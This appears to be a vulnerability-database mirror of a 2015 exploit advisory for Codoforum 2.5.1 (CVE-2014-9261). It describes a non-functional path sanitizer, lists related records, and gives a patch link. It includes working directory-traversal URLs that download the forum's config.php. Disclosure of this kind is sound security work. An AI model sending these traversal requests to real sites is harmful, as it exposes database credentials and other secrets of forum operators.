Codoforum 2.5.1 Arbitrary File Download

🗓️ 10 Mar 2015 00:00:00Reported by Kacper SzurekType

packetstorm🔗 packetstormsecurity.com👁 24 Views

Codoforum 2.5.1 Arbitrary File Download vulnerabilit

Reporter	Title	Published	Views	Family All 9
0day.today	Codoforum 2.5.1 Arbitrary File Download Vulnerability	10 Mar 201500:00	–	zdt
CNVD	Codoforum Filtering Feature Directory Traversal Vulnerability	24 Mar 201500:00	–	cnvd
CVE	CVE-2014-9261	23 Mar 201516:00	–	cve
Cvelist	CVE-2014-9261	23 Mar 201516:00	–	cvelist
Exploit DB	CodoForum 2.5.1 - Arbitrary File Download	10 Mar 201500:00	–	exploitdb
exploitpack	CodoForum 2.5.1 - Arbitrary File Download	10 Mar 201500:00	–	exploitpack
NVD	CVE-2014-9261	23 Mar 201516:59	–	nvd
OpenVAS	Codoforum Arbitrary File Download Vulnerability	17 Mar 201500:00	–	openvas
Prion	Directory traversal	23 Mar 201516:59	–	prion

`# Exploit Title: Codoforum 2.5.1 Arbitrary File Download  
# Date: 23-11-2014  
# Software Link: https://codoforum.com/  
# Exploit Author: Kacper Szurek  
# Contact: http://twitter.com/KacperSzurek  
# Website: http://security.szurek.pl/  
# Category: webapps  
# CVE: CVE-2014-9261  
  
1. Description  
  
str_replace() is used to sanitize file path but function output is not assigned to variable  
  
private function sanitize($name) {  
  
str_replace("..", "", $name);  
str_replace("%2e%2e", "", $name);  
  
return $name;  
}  
  
http://security.szurek.pl/codoforum-251-arbitrary-file-download.html  
  
2. Proof of Concept  
  
http://codoforum-url/index.php?u=serve/attachment&path=../../../../../sites/default/config.php  
or  
http://codoforum-url/index.php?u=serve/smiley&path=../../../../../sites/default/config.php  
  
3. Solution:  
  
Use patch:  
  
https://codoforum.com/upgrades/codoforum.v.2.6.up.zip  
`

10 Mar 2015 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.17212